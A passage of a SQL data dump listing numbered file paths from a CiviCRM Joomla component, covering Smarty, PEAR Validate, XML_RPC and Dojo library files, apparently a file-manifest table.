ivicrm/packages/Smarty/internals/core.load_resource_plugin.php'),(10263,'onents/com_civiccrm/civicrm/packages/Smarty/internals/core.process_cached_inserts.php'),(10264,'onents/com_civiccrm/civicrm/packages/Smarty/internals/core.process_compiled_include.php'),(10265,'onents/com_civiccrm/civicrm/packages/Smarty/internals/core.read_cache_file.php'),(10266,'onents/com_civiccrm/civicrm/packages/Smarty/internals/core.rm_auto.php'),(10267,'onents/com_civiccrm/civicrm/packages/Smarty/internals/core.rmdir.php'),(10268,'onents/com_civiccrm/civicrm/packages/Smarty/internals/core.run_insert_handler.php'),(10269,'onents/com_civiccrm/civicrm/packages/Smarty/internals/core.smarty_include_php.php'),(10270,'onents/com_civiccrm/civicrm/packages/Smarty/internals/core.write_cache_file.php'),(10271,'onents/com_civiccrm/civicrm/packages/Smarty/internals/core.write_compiled_include.php'),(10272,'onents/com_civiccrm/civicrm/packages/Smarty/internals/core.write_compiled_resource.php'),(10273,'onents/com_civiccrm/civicrm/packages/Smarty/internals/core.write_file.php'),(10274,'onents/com_civiccrm/civicrm/packages/Smarty/plugins/block.textformat.php'),(10275,'onents/com_civiccrm/civicrm/packages/Smarty/plugins/compiler.assign.php'),(10276,'onents/com_civiccrm/civicrm/packages/Smarty/plugins/function.assign_debug_info.php'),(10277,'onents/com_civiccrm/civicrm/packages/Smarty/plugins/function.config_load.php'),(10278,'onents/com_civiccrm/civicrm/packages/Smarty/plugins/function.counter.php'),(10279,'onents/com_civiccrm/civicrm/packages/Smarty/plugins/function.cycle.php'),(10280,'onents/com_civiccrm/civicrm/packages/Smarty/plugins/function.debug.php'),(10281,'onents/com_civiccrm/civicrm/packages/Smarty/plugins/function.eval.php'),(10282,'onents/com_civiccrm/civicrm/packages/Smarty/plugins/function.fetch.php'),(10283,'onents/com_civiccrm/civicrm/packages/Smarty/plugins/function.html_checkboxes.php'),(10284,'onents/com_civiccrm/civicrm/packages/Smarty/plugins/function.html_image.php'),(10285,'onents/com_civiccrm/civicrm/packages/Smarty/plugins/function.html_options.php'),(10286,'onents/com_civiccrm/civicrm/packages/Smarty/plugins/function.html_radios.php'),(10287,'onents/com_civiccrm/civicrm/packages/Smarty/plugins/function.html_select_date.php'),(10288,'onents/com_civiccrm/civicrm/packages/Smarty/plugins/function.html_select_time.php'),(10289,'onents/com_civiccrm/civicrm/packages/Smarty/plugins/function.html_table.php'),(10290,'onents/com_civiccrm/civicrm/packages/Smarty/plugins/function.mailto.php'),(10291,'onents/com_civiccrm/civicrm/packages/Smarty/plugins/function.math.php'),(10292,'onents/com_civiccrm/civicrm/packages/Smarty/plugins/function.popup.php'),(10293,'onents/com_civiccrm/civicrm/packages/Smarty/plugins/function.popup_init.php'),(10294,'onents/com_civiccrm/civicrm/packages/Smarty/plugins/modifier.capitalize.php'),(10295,'onents/com_civiccrm/civicrm/packages/Smarty/plugins/modifier.cat.php'),(10296,'onents/com_civiccrm/civicrm/packages/Smarty/plugins/modifier.count_characters.php'),(10297,'onents/com_civiccrm/civicrm/packages/Smarty/plugins/modifier.count_paragraphs.php'),(10298,'onents/com_civiccrm/civicrm/packages/Smarty/plugins/modifier.count_sentences.php'),(10299,'onents/com_civiccrm/civicrm/packages/Smarty/plugins/modifier.count_words.php'),(10300,'onents/com_civiccrm/civicrm/packages/Smarty/plugins/modifier.date_format.php'),(10301,'onents/com_civiccrm/civicrm/packages/Smarty/plugins/modifier.debug_print_var.php'),(10302,'onents/com_civiccrm/civicrm/packages/Smarty/plugins/modifier.default.php'),(10303,'onents/com_civiccrm/civicrm/packages/Smarty/plugins/modifier.escape.php'),(10304,'onents/com_civiccrm/civicrm/packages/Smarty/plugins/modifier.indent.php'),(10305,'onents/com_civiccrm/civicrm/packages/Smarty/plugins/modifier.lower.php'),(10306,'onents/com_civiccrm/civicrm/packages/Smarty/plugins/modifier.nl2br.php'),(10307,'onents/com_civiccrm/civicrm/packages/Smarty/plugins/modifier.regex_replace.php'),(10308,'onents/com_civiccrm/civicrm/packages/Smarty/plugins/modifier.replace.php'),(10309,'onents/com_civiccrm/civicrm/packages/Smarty/plugins/modifier.spacify.php'),(10310,'onents/com_civiccrm/civicrm/packages/Smarty/plugins/modifier.string_format.php'),(10311,'onents/com_civiccrm/civicrm/packages/Smarty/plugins/modifier.strip.php'),(10312,'onents/com_civiccrm/civicrm/packages/Smarty/plugins/modifier.strip_tags.php'),(10313,'onents/com_civiccrm/civicrm/packages/Smarty/plugins/modifier.truncate.php'),(10314,'onents/com_civiccrm/civicrm/packages/Smarty/plugins/modifier.upper.php'),(10315,'onents/com_civiccrm/civicrm/packages/Smarty/plugins/modifier.wordwrap.php'),(10316,'onents/com_civiccrm/civicrm/packages/Smarty/plugins/outputfilter.trimwhitespace.php'),(10317,'onents/com_civiccrm/civicrm/packages/Smarty/plugins/shared.escape_special_chars.php'),(10318,'onents/com_civiccrm/civicrm/packages/Smarty/plugins/shared.make_timestamp.php'),(10319,'onents/com_civiccrm/civicrm/packages/System/Command.php'),(10320,'onents/com_civiccrm/civicrm/packages/System.php'),(10321,'onents/com_civiccrm/civicrm/packages/Text/CAPTCHA/Driver/Image.php'),(10322,'onents/com_civiccrm/civicrm/packages/Text/CAPTCHA.php'),(10323,'onents/com_civiccrm/civicrm/packages/Text/Password.php'),(10324,'onents/com_civiccrm/civicrm/packages/Validate/AR.php'),(10325,'onents/com_civiccrm/civicrm/packages/Validate/AT.php'),(10326,'onents/com_civiccrm/civicrm/packages/Validate/BE.php'),(10327,'onents/com_civiccrm/civicrm/packages/Validate/CA.php'),(10328,'onents/com_civiccrm/civicrm/packages/Validate/CH.php'),(10329,'onents/com_civiccrm/civicrm/packages/Validate/DE.php'),(10330,'onents/com_civiccrm/civicrm/packages/Validate/DK.php'),(10331,'onents/com_civiccrm/civicrm/packages/Validate/ES.php'),(10332,'onents/com_civiccrm/civicrm/packages/Validate/FR.php'),(10333,'onents/com_civiccrm/civicrm/packages/Validate/Finance/CreditCard.php'),(10334,'onents/com_civiccrm/civicrm/packages/Validate/Finance/IBAN.php'),(10335,'onents/com_civiccrm/civicrm/packages/Validate/Finance.php'),(10336,'onents/com_civiccrm/civicrm/packages/Validate/IN.php'),(10337,'onents/com_civiccrm/civicrm/packages/Validate/IS.php'),(10338,'onents/com_civiccrm/civicrm/packages/Validate/ISPN.php'),(10339,'onents/com_civiccrm/civicrm/packages/Validate/NL.php'),(10340,'onents/com_civiccrm/civicrm/packages/Validate/NZ.php'),(10341,'onents/com_civiccrm/civicrm/packages/Validate/PL.php'),(10342,'onents/com_civiccrm/civicrm/packages/Validate/UK.php'),(10343,'onents/com_civiccrm/civicrm/packages/Validate/US.php'),(10344,'onents/com_civiccrm/civicrm/packages/Validate/ZA.php'),(10345,'onents/com_civiccrm/civicrm/packages/Validate/ptBR.php'),(10346,'onents/com_civiccrm/civicrm/packages/Validate.php'),(10347,'onents/com_civiccrm/civicrm/packages/XML/RPC/Dump.php'),(10348,'onents/com_civiccrm/civicrm/packages/XML/RPC/Server.php'),(10349,'onents/com_civiccrm/civicrm/packages/XML/RPC.php'),(10350,'onents/com_civiccrm/civicrm/packages/dojo/dojo.js'),(10351,'onents/com_civiccrm/civicrm/packages/dojo/iframe_history.html'),(10352,'onents/com_civiccrm/civicrm/packages/dojo/src/AdapterRegistry.js'),(10353,'onents/com_civiccrm/civicrm/packages/dojo/src/Deferred.js'),(10354,'onents/com_civiccrm/civicrm/packages/dojo/src/DeferredList.js'),(10355,'onents/com_civiccrm/civicrm/packages/dojo/src/a11y.js'),(10356,'onents/com_civiccrm/civicrm/packages/dojo/src/animation/Animation.js'),(10357,'onents/com_civiccrm/civicrm/packages/dojo/src/animation/AnimationEvent.js'),(10358,'onents/com_civiccrm/civicrm/packages/dojo/src/animation/AnimationSequence.js'),(10359,'onents/com_civiccrm/civicrm/packages/dojo/src/animation/Timer.js'),(10360,'onents/com_civiccrm/civicrm/packages/dojo/src/animation/__package__.js'),(10361,'onents/com_civiccrm/civicrm/packages/dojo/src/animation.js'),(10362,'onents/com_civiccrm/civicrm/packages/dojo/src/behavior.js'),(10363,'onents/com_civiccrm/civicrm/packages/dojo/src/bootstrap1.js'),(10364,'onents/com_civiccrm/civicrm/packages/dojo/src/browser_debug.js'),(10365,'onents/com_civiccrm/civicrm/packages/dojo/src/browser_debug_xd.js'),(10366,'onents/com_civiccrm/civicrm/packages/dojo/src/cal/iCalendar.js'),(10367,'onents/com_civiccrm/civicrm/packages/dojo/src/cal/textDirectory.js'),(10368,'onents/com_civiccrm/civicrm/packages/dojo/src/charting/Axis.js'),(10369,'onents/com_civiccrm/civicrm/packages/dojo/src/charting/Chart.js'),(10370,'onents/com_civiccrm/civicrm/packages/dojo/src/charting/Plot.js'),(10371,'onents/com_civiccrm/civicrm/packages/dojo/src/charting/PlotArea.js'),(10372,'onents/com_civiccrm/civicrm/packages/dojo/src/charting/Plotters.js'),(10373,'onents/com_civiccrm/civicrm/packages/dojo/src/charting/Series.js'),(10374,'onents/com_civiccrm/civicrm/packages/dojo/src/charting/__package__.js'),(10375,'onents/com_civiccrm/civicrm/packages/dojo/src/charting/svg/Axis.js'),(10376,'onents/com_civiccrm/civicrm/packages/dojo/src/charting/svg/PlotArea.js'),(10377,'onents/com_civiccrm/civicrm/packages/dojo/src/charting/svg/Plotters.js'),(10378,'onents/com_civiccrm/civicrm/packages/dojo/src/charting/vml/Axis.js'),(10379,'onents/com_civiccrm/civicrm/packages/dojo/src/charting/vml/PlotArea.js'),(10380,'onents/com_civiccrm/civicrm/packages/dojo/src/charting/vml/Plotters.js'),(10381,'onents/com_civiccrm/civicrm/packages/dojo/src/collections/ArrayList.js'),(10382,'onents/com_civiccrm/civicrm/packages/dojo/src/collections/BinaryTree.js'),(10383,'onents/com_civiccrm/civicrm/packages/dojo/src/collections/Collections.js'),(10384,'onents/com_civiccrm/civicrm/packages/dojo/src/collections/Dictionary.js'),(10385,'onents/com_civiccrm/civicrm/packages/dojo/src/collections/Graph.js'),(10386,'onents/com_civiccrm/civicrm/packages/dojo/src/collections/Queue.js'),(10387,'onents/com_civiccrm/civicrm/packages/dojo/src/collections/Set.js'),(10388,'onents/com_civiccrm/civicrm/packages/dojo/src/collections/SkipList.js'),(10389,'onents/com_civiccrm/civicrm/packages/dojo/src/collections/SortedList.js'),(10390,'onents/com_civiccrm/civicrm/packages/dojo/src/collections/Stack.js'),(10391,'onents/com_civiccrm/civicrm/packages/dojo/src/collections/Store.js'),(10392,'onents/com_civiccrm/civicrm/packages/dojo/src/collections/__package__.js'),(10393,'onents/com_civiccrm/civicrm/packages/dojo/src/crypto/Blowfish.js'),(10394,'onents/com_civiccrm/civicrm/packages/dojo/src/crypto/MD5.js'),(10395,'onents/com_civiccrm/civicrm/packages/dojo/src/crypto/Rijndael.js'),(10396,'onents/com_civiccrm/civicrm/packages/dojo/src/crypto/SHA1.js'),(10397,'onents/com_civiccrm/civicrm/packages/dojo/src/crypto/SHA256.js'),(10398,'onents/com_civiccrm/civicrm/packages/dojo/src/crypto/__package__.js'),(10399,'onents/com_civiccrm/civicrm/packages/dojo/src/crypto.js'),(10400,'onents/com_civiccrm/civicrm/packages/dojo/src/data/CsvStore.js'),(10401,'onents/com_civiccrm/civicrm/packages/dojo/src/data/OpmlStore.js'),(10402,'onents/com_civiccrm/civicrm/packages/dojo/src/data/RdfStore.js'),(10403,'onents/com_civiccrm/civicrm/packages/dojo/src/data/YahooStore.js'),(10404,'onents/com_civiccrm/civicrm/packages/dojo/src/data/old/Attribute.js'),(10405,'onents/com_civiccrm/civicrm/packages/dojo/src/data/old/Item.js'),(10406,'onents/com_civiccrm/civicrm/packages/dojo/src/data/old/Kind.js'),(10407,'onents/com_civiccrm/civicrm/packages/dojo/src/data/old/Observable.js'),(10408,'onents/com_civiccrm/civicrm/packages/dojo/src/data/old/ResultSet.js'),(10409,'onents/com_civiccrm/civicrm/packages/dojo/src/data/old/Type.js'),(10410,'onents/com_civiccrm/civicrm/packages/dojo/src/data/old/Value.js'),(10411,'onents/com_civiccrm/civicrm/packages/dojo/src/data/old/__package__.js'),(10412,'onents/com_civiccrm/civicrm/packages/dojo/src/data/old/format/Csv.js'),(10413,'onents/com_civiccrm/civicrm/packages/dojo/src/data/old/format/Json.js'),(10414,'onents/com_civiccrm/civicrm/packages/dojo/src/data/old/provider/Base.js'),(10415,'onents/com_civiccrm/civicrm/packages/dojo/src/data/old/provider/Delicious.js'),(10416,'onents/com_civiccrm/civicrm/packages/dojo/src/data/old/provider/FlatFile.js'),(10417,'onents/com_civiccrm/civicrm/packages/dojo/src/data/old/provider/JotSpot.js'),(10418,'onents/com_civiccrm/civicrm/packages/dojo/src/data/old/provider/MySql.js'),(10419,'onents/com_civiccrm/civicrm/packages/dojo/src/data.js'),(10420,'onents/com_civiccrm/civicrm/packages/dojo/src/date/common.js'),(10421,'onents/com_civiccrm/civicrm/packages/dojo/src/date/format.js'),(10422,'onents/com_civiccrm/civicrm/packages/dojo/src/date/serialize.js'),(10423,'onents/com_civiccrm/civicrm/packages/dojo/src/date/supplemental.js'),(10424,'onents/com_civiccrm/civicrm/packages/dojo/src/date.js'),(10425,'onents/com_civiccrm/civicrm/packages/dojo/src/debug/Firebug.js'),(10426,'onents/com_civiccrm/civicrm/packages/dojo/src/debug/console.js'),(10427,'onents/com_civiccrm/civicrm/packages/dojo/src/debug/deep.html'),(10428,'onents/com_civiccrm/civicrm/packages/dojo/src/debug.js'),(10429,'onents/com_civiccrm/civicrm/packages/dojo/src/dnd/DragAndDrop.js'),(10430,'onents/com_civiccrm/civicrm/packages/dojo/src/dnd/HtmlDragAndDrop.js'),(10431,'onents/com_civiccrm/civicrm/packages/dojo/src/dnd/HtmlDragCopy.js'),(10432,'onents/com_civiccrm/civicrm/packages/dojo/src/dnd/HtmlDragManager.js'),(10433,'onents/com_civiccrm/civicrm/packages/dojo/src/dnd/HtmlDragMove.js'),(10434,'onents/com_civiccrm/civicrm/packages/dojo/src/dnd/Sortable.js'),(10435,'onents/com_civiccrm/civicrm/packages/dojo/src/dnd/TreeDragAndDrop.js'),(10436,'onents/com_civiccrm/civicrm/packages/dojo/src/dnd/TreeDragAndDropV3.js'),(10437,'onents/com_civiccrm/civicrm/packages/dojo/src/dnd/__package__.js'),(10438,'onents/com_civiccrm/civicrm/packages/dojo/src/docs.js'),(10439,'onents/com_civiccrm/civicrm/packages/dojo/src/dom.js'),(10440,'onents/com_civiccrm/civicrm/packages/dojo/src/event/__package__.js'),(10441,'onents/com_civiccrm/civicrm/packages/dojo/src/event/browser.js'),(10442,'onents/com_civiccrm/civicrm/packages/dojo/src/event/common.js'),(10443,'onents/com_civiccrm/civicrm/packages/dojo/src/event/topic.js'),(10444,'onents/com_civiccrm/civicrm/packages/dojo/src/event.js'),(10445,'onents/com_civiccrm/civicrm/packages/dojo/src/experimental.js'),(10446,'onents/com_civiccrm/civicrm/packages/dojo/src/flash.js'),(10447,'onents/com_civiccrm/civicrm/packages/dojo/src/gfx/Colorspace.js'),(10448,'onents/com_civiccrm/civicrm/packages/dojo/src/gfx/__package__.js'),(10449,'onents/com_civiccrm/civicrm/packages/dojo/src/gfx/color/hsl.js'),(10450,'onents/com_civiccrm/civicrm/packages/dojo/src/gfx/color/hsv.js'),(10451,'onents/com_civiccrm/civicrm/packages/dojo/src/gfx/color.js'),(10452,'onents/com_civiccrm/civicrm/packages/dojo/src/gfx/common.js'),(10453,'onents/com_civiccrm/civicrm/packages/dojo/src/gfx/matrix.js'),(10454,'onents/com_civiccrm/civicrm/packages/dojo/src/gfx/path.js'),(10455,'onents/com_civiccrm/civicrm/packages/dojo/src/gfx/shape.js'),(10456,'onents/com_civiccrm/civicrm/packages/dojo/src/gfx/svg.js'),(10457,'onents/com_civiccrm/civicrm/packages/dojo/src/gfx/vml.js'),(10458,'onents/com_civiccrm/civicrm/packages/dojo/src/graphics/Colorspace.js'),(10459,'onents/com_civiccrm/civicrm/packages/dojo/src/graphics/__package__.js'),(10460,'onents/com_civiccrm/civicrm/packages/dojo/src/graphics/color/hsl.js'),(10461,'onents/com_civiccrm/civicrm/packages/dojo/src/graphics/color/hsv.js'),(10462,'onents/com_civiccrm/civicrm/packages/dojo/src/graphics/color.js'),(10463,'onents/com_civiccrm/civicrm/packages/dojo/src/hostenv_adobesvg.js'),(10464,'onents/com_civiccrm/civicrm/packages/dojo/src/hostenv_browser.js'),(10465,'onents/com_civiccrm/civicrm/packages/dojo/src/hostenv_dashboard.js'),(10466,'onents/com_civiccrm/civicrm/packages/dojo/src/hostenv_jsc.js'),(10467,'onents/com_civiccrm/civicrm/packages/dojo/src/hostenv_rhino.js'),(10468,'onents/com_civiccrm/civicrm/packages/dojo/src/hostenv_spidermonkey.js'),(10469,'onents/com_civiccrm/civicrm/packages/dojo/src/hostenv_svg.js'),(10470,'onents/com_civiccrm/civicrm/packages/dojo/src/hostenv_wsh.js'),(10471,'onents/com_civiccrm/civicrm/packages/dojo/src/html/__package__.js'),(10472,'onents/com_civiccrm/civicrm/packages/dojo/src/html/color.js'),(10473,'onents/com_civiccrm/civicrm/packages/dojo/src/html/common.js'),(10474,'onents/com_civiccrm/civicrm/packages/dojo/src/html/display.js'),(10475,'onents/com_civiccrm/civicrm/packages/dojo/src/html/iframe.js'),(10476,'onents/com_civiccrm/civicrm/packages/dojo/src/html/layout.js'),(10477,'onents/com_civiccrm/civicrm/packages/dojo/src/html/metrics.js'),(10478,'onents/com_civiccrm/civicrm/packages/dojo/src/html/selection.js'),(10479,'onents/com_civiccrm/civicrm/packages/dojo/src/html/shadow.js'),(10480,'onents/com_civiccrm/civicrm/packages/dojo/src/html/style.js'),(10481,'onents/com_civiccrm/civicrm/packages/dojo/src/html/util.js'),(10482,'onents/com_civiccrm/civicrm/packages/dojo/src/html.js'),(10483,'onents/com_civiccrm/civicrm/packages/dojo/src/i18n/calendar/nls/de/gregorian.js'),(10484,'onents/com_civiccrm/civicrm/packages/dojo/src/i18n/calendar/nls/en/gregorian.js'),(10485,'onents/com_civiccrm/civicrm/packages/dojo/src/i18n/calendar/nls/es/gregorian.js'),(10486,'onents/com_civiccrm/civicrm/packages/dojo/src/i18n/calendar/nls/fi/gregorian.js'),(10487,'onents/com_civiccrm/civicrm/packages/dojo/src/i18n/calendar/nls/fr/gregorian.js'),(10488,'onents/com_civiccrm/civicrm/packages/dojo/src/i18n/calendar/nls/gregorian.js'),(10489,'onents/com_civiccrm/civicrm/packages/dojo/src/i18n/calendar/nls/gregorianExtras.js'),(10490,'onents/com_civiccrm/civicrm/packages/dojo/src/i18n/calendar/nls/hu/gregorian.js'),(10491,'onents/com_civiccrm/civicrm/packages/dojo/src/i18n/calendar/nls/it/gregorian.js'),(10492,'onents/com_civiccrm/civicrm/packages/dojo/src/i18n/calendar/nls/ja/gregorian.js'),(10493,'onents/com_civiccrm/civicrm/packages/dojo/src/i18n/calendar/nls/ja/gregorianExtras.js'),(10494,'onents/com_civiccrm/civicrm/packages/dojo/src/i18n/calendar/nls/ko/gregorian.js'),(10495,'onents/com_civiccrm/civicrm/packages/dojo/src/i18n/calendar/nls/nl/gregorian.js'),(10496,'onents/com_civiccrm/civicrm/packages/dojo/src/i18n/calendar/nls/pt/gregorian.js'),(10497,'onents/com_civiccrm/civicrm/packages/dojo/src/i18n/calendar/nls/pt-br/gregorian.js'),(10498,'onents/com_civiccrm/civicrm/packages/dojo/src/i18n/calendar/nls/sv/gregorian.js'),(10499,'onents/com_civiccrm/civicrm/packages/dojo/src/i18n/calendar/nls/zh/gregorian.js'),(10500,'onents/com_civiccrm/civicrm/packages/dojo/src/i18n/calendar/nls/zh/gregorianExtras.js'),(10501,'onents/com_civiccrm/civicrm/packages/dojo/src/i18n/calendar/nls/zh-cn/gregorian.js'),(10502,'onents/com_civiccrm/civicrm/packages/dojo/src/i18n/calendar/nls/zh-hk/gregorian.js'),(10503,'onents/com_civiccrm/civicrm/packages/dojo/src/i18n/calendar/nls/zh-tw/gregorian.js'),(10504,'onents/com_civiccrm/civicrm/packages/dojo/src/i18n/common.js'),(10505,'onents/com_civiccrm/civicrm/packages/dojo/src/i18n/currency/common.js'),(10506,'onents/com_civiccrm/civicrm/packages/dojo/src/i18n/currency/nls/EUR.js'),(10507,'onents/com_civiccrm/civicrm/packages/dojo/src/i18n/currency/nls/GBP.js'),(10508,'onents/com_civiccrm/civicrm/packages/dojo/src/i18n/currency/nls/INR.js'),(10509,'onents/com_civiccrm/civicrm/packages/dojo/src/i18n/currency/nls/ITL.js'),(10510,'onents/com_civiccrm/civicrm/packages/dojo/src/i18n/currency/nls/JPY.js'),(10511,'onents/com_civiccrm/civicrm/packages/dojo/src/i18n/currency/nls/USD.js'),(10512,'onents/com_civiccrm/civicrm/packages/dojo/src/i18n/currency/nls/en/EUR.js'),(10513,'onents/com_civiccrm/civicrm/packages/dojo/src/i18n/currency/nls/en/GBP.js'),(10514,'onents/com_civiccrm/civicrm/packages/dojo/src/i18n/currency/nls/en/INR.js'),(10515,'onents/com_civiccrm/civicrm/packages/dojo/src/i18n/currency/nls/en/ITL.js'),(10516,'onents/com_civiccrm/civicrm/packages/dojo/src/i18n/currency/nls/en/JPY.js'),(10517,'onents/com_civiccrm/civicrm/packages/dojo/src/i18n/currency/nls/en/USD.js'),(10518,'onents/com_civiccrm/civicrm/packages/dojo/src/i18n/currency/nls/en-us/USD.js'),(10519,'onents/com_civiccrm/civicrm/packages/dojo/src/i18n/currency/nls/hi/EUR.js'),(10520,'onents/com_civiccrm/civicrm/packages/dojo/src/i18n/currency/nls/hi/GBP.js'),(10521,'onents/com_civiccrm/civicrm/packages/dojo/src/i18n/currency/nls/hi/INR.js'),(10522,'onents/com_civiccrm/civicrm/packages/dojo/src/i18n/currency/nls/hi/ITL.js'),(10523,'onents/com_civiccrm/civicrm/packages/dojo/src/i18n/currency/nls/hi/JPY.js'),(10524,'onents/com_civiccrm/civicrm/packages/dojo/src/i18n/currency/nls/hi/USD.js'),(10525,'onents/com_civiccrm/civicrm/packages/dojo/src/i18n/currency/nls/ja/EUR.js'),(10526,'onents/com_civiccrm/civicrm/packages/dojo/src/i18n/currency/nls/ja/GBP.js'),(10527,'onents/com_civiccrm/civicrm/packages/dojo/src/i18n/currency/nls/ja/INR.js'),(10528,'onents/com_civiccrm/civicrm/packages/dojo/src/i18n/currency/nls/ja/ITL.js'),(10529,'onents/com_civiccrm/civicrm/packages/dojo/src/i18n/currency/nls/ja/JPY.js'),(10530,'onents/com_civiccrm/civicrm/packages/dojo/src/i18n/currency/nls/ja/USD.js'),(10531,'onents/com_civiccrm/civicrm/packages/dojo/src/i18n/currency.js'),(10532,'onents/com_civiccrm/civicrm/packages/dojo/src/i18n/number.js'),(10533,'onents/com_civiccrm/civicrm/packages/dojo/src/iCalendar.js'),(10534,'onents/com_civiccrm/civicrm/packages/dojo/src/io/BrowserIO.js'),(10535,'onents/com_civiccrm/civicrm/packages/dojo/src/io/IframeIO.js'),(10536,'onents/com_civiccrm/civicrm/packages/dojo/src/io/RepubsubIO.js'),(10537,'onents/com_civiccrm/civicrm/packages/dojo/src/io/RhinoIO.js'),(10538,'onents/com_civiccrm/civicrm/packages/dojo/src/io/ScriptSrcIO.js'),(10539,'onents/com_civiccrm/civicrm/packages/dojo/src/io/XhrIframeProxy.js'),(10540,'onents/com_civiccrm/civicrm/packages/dojo/src/io/__package__.js'),(10541,'onents/com_civiccrm/civicrm/packages/dojo/src/io/cometd.js'),(10542,'onents/com_civiccrm/civicrm/packages/dojo/src/io/common.js'),(10543,'onents/com_civiccrm/civicrm/packages/dojo/src/io/cookie.js'),(10544,'onents/com_civiccrm/civicrm/packages/dojo/src/io/xip_client.html'),(10545,'onents/com_civiccrm/civicrm/packages/dojo/src/io/xip_server.html'),(10546,'onents/com_civiccrm/civicrm/packages/dojo/src/io.js'),(10547,'onents/com_civiccrm/civicrm/packages/dojo/src/json.js'),(10548,'onents/com_civiccrm/civicrm/packages/dojo/src/lang/__package__.js'),(10549,'onents/com_civiccrm/civicrm/packages/dojo/src/lang/array.js'),(10550,'onents/com_civiccrm/civicrm/packages/dojo/src/lang/assert.js'),(10551,'onents/com_civiccrm/civicrm/packages/dojo/src/lang/common.js'),(10552,'onents/com_civiccrm/civicrm/packages/dojo/src/lang/declare.js'),(10553,'onents/com_civiccrm/civicrm/packages/dojo/src/lang/extras.js'),(10554,'onents/com_civiccrm/civicrm/packages/dojo/src/lang/func.js'),(10555,'onents/com_civiccrm/civicrm/packages/dojo/src/lang/repr.js'),(10556,'onents/com_civiccrm/civicrm/packages/dojo/src/lang/timing/Streamer.js'),(10557,'onents/com_civiccrm/civicrm/packages/dojo/src/lang/timing/Timer.js'),(10558,'onents/com_civiccrm/civicrm/packages/dojo/src/lang/timing/__package__.js'),(10559,'onents/com_civiccrm/civicrm/packages/dojo/src/lang/type.js'),(10560,'onents/com_civiccrm/civicrm/packages/dojo/src/lang.js'),(10561,'onents/com_civiccrm/civicrm/packages/dojo/src/lfx/Animation.js'),(10562,'onents/com_civiccrm/civicrm/packages/dojo/src/lfx/__package__.js'),(10563,'onents/com_civiccrm/civicrm/packages/dojo/src/lfx/extras.js'),(10564,'onents/com_civiccrm/civicrm/packages/dojo/src/lfx/html.js'),(10565,'onents/com_civiccrm/civicrm/packages/dojo/src/lfx/rounded.js'),(10566,'onents/com_civiccrm/civicrm/packages/dojo/src/lfx/shadow.js'),(10567,'onents/com_civiccrm/civicrm/packages/dojo/src/lfx/toggle.js'),(10568,'onents/com_civiccrm/civicrm/packages/dojo/src/loader.js'),(10569,'onents/com_civiccrm/civicrm/packages/dojo/src/loader_xd.js'),(10570,'onents/com_civiccrm/civicrm/packages/dojo/src/logging/ConsoleLogger.js'),(10571,'onents/com_civiccrm/civicrm/packages/dojo/src/logging/Logger.js'),(10572,'onents/com_civiccrm/civicrm/packages/dojo/src/logging/__package__.js'),(10573,'onents/com_civiccrm/civicrm/packages/dojo/src/math/__package__.js'),(10574,'onents/com_civiccrm/civicrm/packages/dojo/src/math/curves.js'),(10575,'onents/com_civiccrm/civicrm/packages/dojo/src/math/matrix.js'),(10576,'onents/com_civiccrm/civicrm/packages/dojo/src/math/points.js'),(10577,'onents/com_civiccrm/civicrm/packages/dojo/src/math.js'),(10578,'onents/com_civiccrm/civicrm/packages/dojo/src/namespaces/dojo.js'),(10579,'onents/com_civiccrm/civicrm/packages/dojo/src/ns.js'),(10580,'onents/com_civiccrm/civicrm/packages/dojo/src/profile.js'),(10581,'onents/com_civiccrm/civicrm/packages/dojo/src/regexp.js'),(10582,'onents/com_civiccrm/civicrm/packages/dojo/src/rpc/Deferred.js'),(10583,'onents/com_civiccrm/civicrm/packages/dojo/src/rpc/JotService.js'),(10584,'onents/com_civiccrm/civicrm/packages/dojo/src/rpc/JsonService.js'),(10585,'onents/com_civiccrm/civicrm/packages/dojo/src/rpc/RpcService.js'),(10586,'onents/com_civiccrm/civicrm/packages/dojo/src/rpc/YahooService.js'),(10587,'onents/com_civiccrm/civicrm/packages/dojo/src/rpc/__package__.js'),(10588,'onents/com_civiccrm/civicrm/packages/dojo/src/selection/Selection.js'),(10589,'onents/com_civiccrm/civicrm/packages/dojo/src/storage/__package__.js'),(10590,'onents/com_civiccrm/civicrm/packages/dojo/src/storage/browser.js'),(10591,'onents/com_civiccrm/civicrm/packages/dojo/src/storage.js'),(10592,'onents/com_civiccrm/civicrm/packages/dojo/src/string/Builder.js'),(10593,'onents/com_civiccrm/civicrm/packages/dojo/src/string/__package__.js'),(10594,'onents/com_civiccrm/civicrm/packages/dojo/src/string/common.js'),(10595,'onents/com_civiccrm/civicrm/packages/dojo/src/string/extras.js'),(10596,'onents/com_civiccrm/civicrm/packages/dojo/src/string.js'),(10597,'onents/com_civiccrm/civicrm/packages/dojo/src/style.js'),(10598,'onents/com_civiccrm/civicrm/packages/dojo/src/svg.js'),(10599,'onents/com_civiccrm/civicrm/packages/dojo/src/text/__package__.js'),(10600,'onents/com_civiccrm/civicrm/packages/dojo/src/text/textDirectory.js'),(10601,'onents/com_civiccrm/civicrm/packages/dojo/src/undo/Manager.js'),(10602,'onents/com_civiccrm/civicrm/packages/dojo/src/undo/__package__.js'),(10603,'onents/com_civiccrm/civicrm/packages/dojo/src/undo/browser.js'),(10604,'onents/com_civiccrm/civicrm/packages/dojo/src/uri/Uri.js'),(10605,'onents/com_civiccrm/civicrm/packages/dojo/src/uri/__package__.js'),(10606,'onents/com_civiccrm/civicrm/packages/dojo/src/uri/cache.js'),(10607,'onents/com_civiccrm/civicrm/packages/dojo/src/uuid/LightweightGenerator.js'),(10608,'onents/com_civiccrm/civicrm/packages/dojo/src/uuid/NameBasedGenerator.js'),(10609,'onents/com_civiccrm/civicrm/packages/dojo/src/uuid/NilGenerator.js'),(10610,'onents/com_civiccrm/civicrm/packages/dojo/src/uuid/RandomGenerator.js'),(10611,'onents/com_civiccrm/civicrm/packages/dojo/src/uuid/TimeBasedGenerator.js'),(10612,'onents/com_civiccrm/civicrm/packages/dojo/src/uuid/Uuid.js'),(10613,'onents/com_civiccrm/civicrm/packages/dojo/src/uuid/__package__.js'),(10614,'onents/com_civiccrm/civicrm/packages/dojo/src/validate/__package__.js'),(10615,'onents/com_civiccrm/civicrm/packages/dojo/src/validate/check.js'),(10616,'onents/com_civiccrm/civicrm/packages/dojo/src/validate/common.js'),(10617,'onents/com_civiccrm/civicrm/packages/dojo/src/validate/creditCard.js'),(10618,'onents/com_civiccrm/civicrm/packages/dojo/src/validate/datetime.js'),(10619,'onents/com_civiccrm/civicrm/packages/dojo/src/validate/de.js'),(10620,'onents/com_civiccrm/civicrm/packages/dojo/src/validate/jp.js'),(10621,'onents/com_civiccrm/civicrm/packages/dojo/src/validate/u